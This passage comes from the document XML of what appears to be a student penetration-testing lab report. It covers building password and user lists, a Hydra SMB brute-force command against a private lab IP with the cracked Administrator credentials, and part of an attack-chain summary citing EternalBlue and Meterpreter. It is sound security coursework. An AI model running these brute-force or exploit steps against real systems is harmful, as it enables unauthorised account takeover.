          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>student</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FD1F89" w14:textId="61F3EE50" w:rsidR="00EA5ED4" w:rsidRPr="00EA5ED4" w:rsidRDefault="00EA5ED4" w:rsidP="00A3381A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA5ED4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-DE" w:eastAsia="en-DE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572A7CA8" wp14:editId="13C98646">
            <wp:extent cx="5943600" cy="2335530"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="330011452" name="Picture 5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11452" name="Picture 56" descr="A computer screen with white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335530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F14D0" w14:textId="36495920" w:rsidR="003D4DCD" w:rsidRPr="0061799E" w:rsidRDefault="00EA5ED4" w:rsidP="00EA5ED4">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0061799E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00CE4657" w:rsidRPr="0061799E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="0061799E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="0061799E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Meterpreter shell output showing local user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B9589" w14:textId="5BFEC41F" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="006E4DD6">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t>The presence of multiple accounts provided potential targets for password attacks. Identifying valid usernames was a critical prerequisite for brute-force testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4A081" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Creation of Custom Wordlist and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Userlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="514E58BE"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Commands Executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF4FBC"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">nano wordlist.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192A98C"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cat wordlist.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227F604A"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nano users.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9DB740"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cat users.txt  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8BC6DA"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Contents of wordlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5958604D"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12345  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E735246" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>P@ssword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19281B47"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password  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB3016"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qwerty  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6085CB" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>letmein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF9B9BA"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welcome  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056ED84"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admin123  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E2855F"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Password1!  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A234BA2"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test123  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719379C"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secret  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D770029"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hello123  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094E1058"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Contents of users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D5C5BB"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Administrator  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0F4E88"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Guest  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4488B5"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student  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D2A98" w14:textId="77777777" w:rsidR="00544CB2" w:rsidRDefault="00544CB2" w:rsidP="00544CB2">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="301237BE" wp14:editId="5DE27B7D">
            <wp:extent cx="5943600" cy="3813175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1690199270"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9270" name="Picture 57"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813175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="248BF2CE" w14:textId="180205A8" w:rsidR="003D4DCD" w:rsidRPr="002E56BF" w:rsidRDefault="00544CB2" w:rsidP="00544CB2">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E56BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00000561" w:rsidRPr="002E56BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="002E56BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="002E56BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Custom wordlist and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="002E56BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>userlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="002E56BF">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F5412" w14:textId="3C11D01D" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="007C3830">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t>This simulated real-world conditions where attackers rely on weak or commonly used passwords. Combined with valid usernames, the files formed the basis for Hydra brute-force testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC8E4FE" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>4. Password Cracking with Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F05D5C9"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Command Executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE78758"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 xml:space="preserve">hydra -L users.txt -P wordlist.txt smb://192.168.57.20 -V  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563FF03E"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b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Successful Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF059FB" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Administrator :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> P@ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B8DBC2" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>student :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> P@ssw0rd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D378C5" w14:textId="491F93E1" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="000D450A" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF7034C" wp14:editId="2809907C">
            <wp:extent cx="5943600" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="839603528" name="Picture 5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03528" name="Picture 58" descr="A screen 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035935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CCE87F" w14:textId="0D593730" w:rsidR="003D4DCD" w:rsidRPr="00487121" w:rsidRDefault="008F6FB7" w:rsidP="008F6FB7">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487121">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00B44DE0" w:rsidRPr="00487121">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="00487121">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003D4DCD" w:rsidRPr="00487121">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hydra output showing successful login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046454A" w14:textId="7E8C2BF5" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="007C3830">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Weak passwords allowed Hydra to crack both the Administrator and student accounts. The compromise of Administrator credentials provides attackers with full privileges, bypassing other system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DCF848" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>Consolidated Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DB82C" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="003D4DCD">
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>The screenshots and steps demonstrate a full attack chain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF5DE8" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Roboto" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote code execution on 192.168.57.20.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C252A9" w14:textId="77777777" w:rsidR="003D4DCD" w:rsidRPr="003D4DCD" w:rsidRDefault="003D4DCD" w:rsidP="00063B3B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:lang w:val="en-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4DCD">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:b/>
          <w:bCs/>
